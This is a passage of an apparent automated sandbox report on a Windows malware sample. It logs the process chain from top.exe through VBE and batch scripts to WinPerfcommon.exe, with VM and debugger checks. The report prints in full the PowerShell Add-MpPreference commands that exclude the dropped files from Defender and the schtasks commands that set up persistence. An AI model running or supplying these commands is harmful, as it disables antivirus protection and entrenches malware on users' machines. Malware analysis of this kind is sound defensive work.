                                    Source: wscript.exe, 00000002.00000002.2355242317.0000000000823000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: WinPerfcommon.exe, 00000006.00000002.2489839766.000000001C025000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: WinPerfcommon.exe, 00000006.00000002.2491625440.000000001C03A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Z6:
                                    Source: WinPerfcommon.exe, 00000006.00000002.2491625440.000000001C03A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: top.exe, 00000000.00000003.2048296646.0000000002B04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Q
                                    Source: C:\Users\user\Desktop\top.exeAPI call chain: ExitProcess graph end nodegraph_0-25019
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0046F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0046F838
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_00477DEE mov eax, dword ptr fs:[00000030h]0_2_00477DEE
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0047C030 GetProcessHeap,0_2_0047C030
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess token adjusted: Debug
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0046F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0046F838
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0046F9D5 SetUnhandledExceptionFilter,0_2_0046F9D5
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0046FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0046FBCA
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_00478EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00478EBD
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Adds a directory exclusion to Windows Defender
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe'
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\SystemSettings.exe'
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msproviderBrokerMonitornet\WinPerfcommon.exe'
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe'Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\top.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msproviderBrokerMonitornet\rS0XRrLecpgQD85mPzoGJptpB8S2GwiBTdu9z4xSSrCX90wlqwqwnpzpgY0I.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\msproviderBrokerMonitornet\WinPerfcommon.exe "C:\msproviderBrokerMonitornet/WinPerfcommon.exe"Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline"Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imeik232\imeik232.cmdline"Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe'Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'" /fJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wnSgpBKJabSHvDawwFjyhiOtGEGVta" /sc ONLOGON /tr "'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'" /rl HIGHEST /fJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\emoAWdy2Gj.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4FDD.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCAA8B5102F2134902BBA166DD4B5C8948.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES520F.tmp" "c:\Windows\System32\CSCBE040DD0C77A40C69F3560F59F6749C9.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0046F654 cpuid 0_2_0046F654
                                    Source: C:\Users\user\Desktop\top.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0046AF0F
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeQueries volume information: C:\msproviderBrokerMonitornet\WinPerfcommon.exe VolumeInformationJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeQueries volume information: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe VolumeInformationJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeQueries volume information: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
